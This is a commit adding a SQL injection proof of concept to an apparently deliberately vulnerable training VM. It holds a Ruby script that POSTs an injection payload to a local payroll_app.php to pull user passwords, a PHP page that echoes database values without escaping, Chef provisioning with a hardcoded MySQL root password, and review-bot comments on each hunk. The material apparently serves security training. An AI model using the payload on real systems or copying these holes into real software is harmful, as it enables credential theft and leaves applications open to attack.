Add poc for sql injection.

James Barnett 2017-04-11 16:12:46 -05:00
parent dc8ffbcec6
commit bc8fb88017
3 changed files with 26 additions and 0 deletions


@ -38,6 +38,7 @@ if($_POST['s']){
foreach ($keys as $key) {
echo "<td>" . $row[$key] . "</td>";
}
echo "</tr>\n";
}
$result->free();
}
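Review bot: `$row[$key]` is concatenated into the `<td>` markup without HTML encoding, so any value stored in the table is rendered as markup in the browser. If this page is meant to be hardened, the line should read `echo "<td>" . htmlspecialchars($row[$key], ENT_QUOTES, 'UTF-8') . "</td>";`. If the behaviour is deliberate for a training target, which the commit title suggests but the page does not state, a one-line comment above the loop saying so would keep the pattern from being copied elsewhere. The enclosing `if($_POST['s'])` block starts outside the hunk, so how `$result` is produced is not visible here.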


@ -0,0 +1,14 @@
require 'net/http'
url = "http://127.0.0.1/payroll_app.php"
uri = URI(url)
user = 'luke_skywalker'
injection = "password'; select password from users where username='' OR ''='"
puts "Making POST request to #{uri} with the following parameters:"
puts "'user' = #{user}"
puts "'password' = #{injection}"
res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
puts "Response body is #{res.body}"
puts "Done"
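Review bot: The script prints the response body and `Done` whatever the server returned, so an error response or an application that already rejects the input looks the same as a successful run, and the file cannot double as a regression check once the query is fixed. Checking the status before printing, for example `abort "Unexpected HTTP #{res.code}" unless res.is_a?(Net::HTTPSuccess)`, would make a failed run visible. The file also has no header comment; a line such as `# Demonstrates SQL injection through the 'password' field of payroll_app.php on the local lab VM.` would tell a reader what the script is for and that the loopback target is intentional.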


@ -13,6 +13,17 @@ cookbook_file '/tmp/payroll.sql' do
mode '0755'
end
directory '/home/vagrant/poc/payroll_app/' do
mode '0755'
owner 'vagrant'
recursive true
end
cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
source 'payroll_app/poc.rb'
mode '0755'
end
bash 'create payroll database and import data' do
code <<-EOH
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"
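Review bot: The new `cookbook_file` for `poc.rb` sets `mode` but no `owner`, so the file takes the default ownership of the Chef run (typically root) inside a directory owned by `vagrant`; adding `owner 'vagrant'` would match the `directory` resource above it. With `recursive true`, Chef applies `owner` and `mode` only to the leaf directory, so the intermediate `/home/vagrant/poc` is likely created with default ownership as well; declaring it as its own `directory` resource avoids that. The `bash` resource at the end of the hunk continues outside it.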